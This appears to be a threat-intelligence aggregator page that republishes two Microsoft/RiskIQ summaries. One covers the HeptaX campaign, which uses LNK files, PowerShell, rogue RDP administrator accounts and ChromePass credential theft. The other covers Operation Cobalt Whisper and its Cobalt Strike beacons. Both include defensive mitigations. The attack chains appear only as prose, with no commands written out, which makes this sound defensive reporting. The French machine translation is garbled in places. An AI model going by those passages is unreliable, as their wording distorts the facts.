One Article Review
| Source |  RiskIQ |
|---|---|
| Identifiant | 8601768 |
| Date de publication | 2024-10-25 19:15:07 (vue: 2024-10-25 20:07:18) |
| Titre | HEPTAX: Connexions RDP non autorisées pour les opérations de cyberespionnage HeptaX: Unauthorized RDP Connections for Cyberespionage Operations (Recyclage) |
| Texte | #### Industries ciblées - Santé et santé publique ## Instantané Cyble Research and Intelligence Labs (CRIL) a identifié une campagne de cyberattaque active, surnommée "Heptax", à l'aide de fichiers de raccourci malveillants (fichiers LNK) dans une chaîne d'attaque complexe et multi-étages.La campagne n'a pas été attribuée à un acteur de menace connu. ## Description L'attaque commence par un fichier zip contenant le fichier LNK malveillant, probablement distribué par phishing.Sur la base du titre du fichier LNK, Cril évalue les organisations de guérison des cibles Heptax.Lors de l'exécution, ce fichier LNK lance des commandes PowerShell qui téléchargent d'autres scripts PowerShell et fichiers BAT sur l'appareil de la victime \\, permettant aux attaquants de créer un compte administratif et d'ajuster les paramètres de bureau distant (RDP).Cet accès simplifie les sessions RDP non autorisées pour l'exploitation continue. La campagne utilise des outils supplémentaires, comme Chromepass, pour extraire les mots de passe enregistrés des navigateurs à base de chrome, mettant les comptes des victimes \\ 'à plus davantage.Les campagnes répétées de Heptax \\ au cours de la dernière année indiquent qu'il a réussi à tirer parti des mêmes tactiques de base malgré sa visibilité. Les scripts rassemblent également et renvoient systématiquement les informations système détaillées au serveur de commande et de contrôle, ce qui rend ces infections à la fois furtives et polyvalentes.En abaissant les commandes de sécurité, en désactivant le contrôle des comptes d'utilisateurs (UAC) et en obtenant des privilèges administratifs, les attaquants peuvent installer d'autres logiciels malveillants, exfilter les données et surveiller l'activité du système non détectée.La campagne met en évidence la nécessité d'une amélioration des capacités de détection contre les attaques basées sur des scripts, qui ont permis à ce groupe de rester largement inaperçu malgré son activité prolongée et ses techniques récurrentes. ## Analyse Microsoft et contexte OSINT supplémentaire ChromePass est un outil de récupération de mot de passe conçu pour récupérer et afficher les informations d'identification de connexion enregistrées stockées dans des navigateurs à base de chrome, tels que Chrome, Brave et Edge.Bien qu'il ait des utilisations légitimes pour la récupération de mot de passe, les acteurs malveillants exploitent ChromePass pour extraire secrètement les noms d'utilisateur et les mots de passe des appareils victimes de victimes.Une fois déployé sur un système compromis, ChromePass peut rapidement localiser et décrypter les mots de passe, qui sont souvent stockés dans la base de données cryptée d'un navigateur à des fins automatique.En exfiltrant ces informations d'identification, les attaquants obtiennent un accès non autorisé aux comptes sensibles des utilisateurs, y compris les e-mails, les services financiers et les systèmes d'entreprise.Ces données peuvent ensuite être exploitées pour d'autres activités malveillantes, telles que la farce des informations d'identification, le vol d'identité et le phishing de lance, permettant aux cybercriminels d'étendre leur portée et de compromettre des systèmes supplémentaires liés aux comptes de la victime. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/en-us/defender-endpoint/linux-preférences) dans Microsoft Defender Antivirus ou l'équivalent de votre produit antivirus pour couvrir rapidement les outils d'attaquant en évolution et et et les outils d'attaquant en évolution rapide ettechniques.Les protections d'apprentissage automatique basées sur le cloud bloquent la majorité des menaces nouvelles et inconnues. - Exécuter [EDR en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/ed |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed account accounts action active activities activity actor actors additional adjust administrative af74 against alert alerts all allow allowed also analysis antivirus any are artifacts assesses attack attacker attackers attacks attributed augment authority autofill automated back based bat been begins behind block both brave breach breaches browser browsers brute campaign campaigns can capabilities chain changes chrome chromepass chromium cloud com/blog/heptax com/en com/microsoft com/threatanalytics3/9382203e command commands common complex components compromise compromised configure connections considered containing content context control controlled controls copyright core corporate cover covertly create credential credentials cril cyberattack cybercriminals cyberespionage cyble data database decrypt defend defender delivered deployed description designed desktop despite detailed detect detected detection detections/hunting detects device devices disabling display distributed distribution does download dubbed edge edr email enable enabled enabling encrypted encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent endpoints enhanced ensure equivalent even evolving execution exfiltrate exfiltrating expand exploit exploitation external extract file files financial folder folders follow following force from full further gain gaining gather greater group hacktool:win32/autokms hacktool:win32/chromepass harden hardened hardening has have healchare health healthcare heptax heptax: highlights https://cyble https://learn https://security https://www identified identify identity immediate impact include: including indicate industries infections information install intelligence interest interfaces investigation investigations its known labs largely launches learndoc learning legitimate leveraged like likely lnk local locate login lowering lsa lsass machine majority making malicious malware malware: manage management management/ mfa microsoft might mitigations mode monitor multi must name=hacktool:win32/autokms name=hacktool:win32/chromepass name=trojan:script/casdet name=trojan:win32/coinminer name=trojan:win32/killav name=trojan:win32/winlnk need network new non not ocid=magicti often once ongoing operations operations/ organizations osint over overview part passive password passwords past perimeter permission phishing post powershell preferences premises privileges product prohibited prolonged protection protection#how protections public purposes putting queries quickly rapidly rdp reach recommendations recommends recovery recurring reduce reducing reduction reference#block references remain remediate remediation remote repeated reproduction research reserved resolve retrieve rights risk rules run running same saved scanning scenes script scripts secure security send sensitive server services sessions settings shortcut should significantly simplifies site snapshot some spear spray stage stealing stealthy stored stuffing subsystem successfully such surface system systematically systems tactics take tamper targeted targets techniques theft then therefore thereof these threat threats tied title tool tools trojan:powershell/casdet trojan:win32/coinminer trojan:win32/killav trojan:win32/winlnk turn uac unauthorized undetected unknown unnoticed upon us/azure/external us/defender us/wdsi/threats/malware use used user usernames users uses using versatile victim victims view=o365 virtual visibility volume when which windows within without works worldwide written year your zip |
| Tags | Malware Tool Threat Medical |
| Stories | |
| Move | 
|
Les reprises de l'article (1):
| Source | RiskIQ |
|---|---|
| Identifiant | 8601746 |
| Date de publication | 2024-10-25 17:22:14 (vue: 2024-10-25 18:07:27) |
| Titre | Opération Cobalt Whisper: l'acteur de menace cible plusieurs industries à travers Hong Kong et le Pakistan Operation Cobalt Whisper: Threat Actor Targets Multiple Industries Across Hong Kong and Pakistan (Recyclage) |
| Texte | #### Targeted Geolocations - Pakistan - China #### Targeted Industries - Defense Industrial Base - Education - Higher Education - Energy - Information Technology - Healthcare & Public Health ## Snapshot SEQRITE Labs\' APT team has exposed an advanced cyber-espionage campaign known as Operation Cobalt Whisper, impacting multiple industries in Hong Kong and Pakistan. ## Description This operation extensively uses the Cobalt Strike post-exploitation tool, delivered via obfuscated VBScript in infected archives. SEQRITE identified over 20 infection chains, primarily affecting organizations in Hong Kong but also Pakistan, with decoy documents in RAR archives containing both PDF and LNK files. Industries impacted by the campaign include defense, education, enviornmental engineering, energy, cybersecurity, aviation, and healthcare. Technical analysis reveals a two-stage infection process, where an initial LNK executes a VBScript to achieve persistence and hide activity, followed by a Cobalt Strike beacon disguised as a legitimate executable that connects back to the attacker. SEQRITE\'s investigations found commonalities in naming conventions, particularly using the filename “ImeBroker.exe,” to deploy Cobalt Strike implants across multiple activity clusters. Through file path artifacts, machine IDs, and configuration similarities, SEQRITE linked clusters of activity to Operation Cobalt Whisperer, including those aimed at the Pakistani defense sector and electrotechnical researchers. These campaigns reveal sophisticated tactics designed to exploit high-value information from specific industry sectors across Asia, with consistent command-and-control patterns registered with Tencent\'s network infrastructure. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. - Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=magicti_ta_learndoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach. - Allow [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide?ocid=magicti_ta_learndoc) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/enable-controlled-folders) controlled folder access. - Ensure that [tamper protection](https://learn.microsoft.com/en-us/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection#how-do-i-configure-or-manage-tamper-protection) is enabled in Microsoft Defender for Endpoint. - Enable [network protection](https://learn.microsoft.com/en-us/defender-endpoint/enable-network-protection) in Microsoft Defender for Endpoint. - Follow the credential hardening recommendations in the [on-premises credential theft overview](https://security.microsoft.com/threatanalytics3/9382203e-5155-4b5e-af74-21562b1004d5/analystreport) to defend against common credential theft techniques like LSASS access. - [Enable](https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference#block-credential-stealing-from-the-windows-local-security-authority-subsystem) LSA protection. - Microsoft |
| Notes | ★★ |
| Envoyé | Oui |
| Condensat | ### #### **© 2024 2024** 21562b1004d5/analystreport 365/security/defender 4b5e 5155 access accessed achieve across action activity actor advanced af74 affecting against age aimed alert alerts all allow also analysis antivirus any apt archives are artifacts asia attack attacker authority automated aviation back base based beacon behind block both breach breaches but campaign campaigns can chains changes china client cloud clusters cobalt com/blog/operation com/en com/microsoft com/threatanalytics3/9382203e command common commonalities components configuration configure connects consistent containing content control controlled conventions copyright cover credential criterion customers cyber cybersecurity decoy defend defender defense delivered deploy description designed detect detected detections/hunting detects dha disguised distribution documents does edr education electrotechnical email enable enabled encyclopedia endpoint endpoint/attack endpoint/automated endpoint/edr endpoint/enable endpoint/linux endpoint/prevent energy engineering ensure enviornmental equivalent espionage even evolving exe executable executes exploit exploitation exposed extensively file filename files folder folders follow followed following found from full geolocations gpb hardening has health healthcare hide high higher hong https://learn https://security https://www identified ids immediate impact impacted impacting implants include including industrial industries industry infected infection information infrastructure initial investigation investigations known kong labs learndoc learning legitimate like linked list lnk local lsa lsass machine majority malicious malware: manage meet microsoft mitigations mode mtb multiple name=trojan:msil/agenttesla name=trojan:msil/znyonm name=trojan:win32/casdet name=trojan:win32/cobalstrike name=trojan:win32/leonem name=trojan:win32/lnkrunner name=trojan:win64/turtleloader naming network new non not obfuscated ocid=magicti operation organizations over overview pakistan pakistan/ pakistani part particularly passive path patterns pdf permission persistence post preferences premises prevalence prevent primarily process product prohibited protection protection#how protections public queries ransomware rapidly rar recommendations recommends reduce reducing reduction reference#block references registered remediate remediation reproduction researchers reserved resolve reveal reveals rfn rights rule rules run running scenes sector sectors security seqrite settings significantly similarities site snapshot sophisticated specific stage stealing strike subsystem surface tactics take tamper targeted targets team technical techniques technology tencent theft thereof these those threat threats through tool tools trojan:msil/agenttesla trojan:win32/casdet trojan:win32/cobalstrike trojan:win32/leonem trojan:win32/lnkrunner trojan:win32/znyonm trojan:win64/turtleloader trusted turn two unknown unless us/defender us/wdsi/threats/malware used uses using value vbscript view=o365 volume webmail when where whisper whisper: whisperer windows without works worldwide written xdr your “imebroker |
| Tags | Ransomware Malware Tool Threat Industrial Medical |
| Stories | |
| Move |
|
L'article ne semble pas avoir été repris sur un précédent.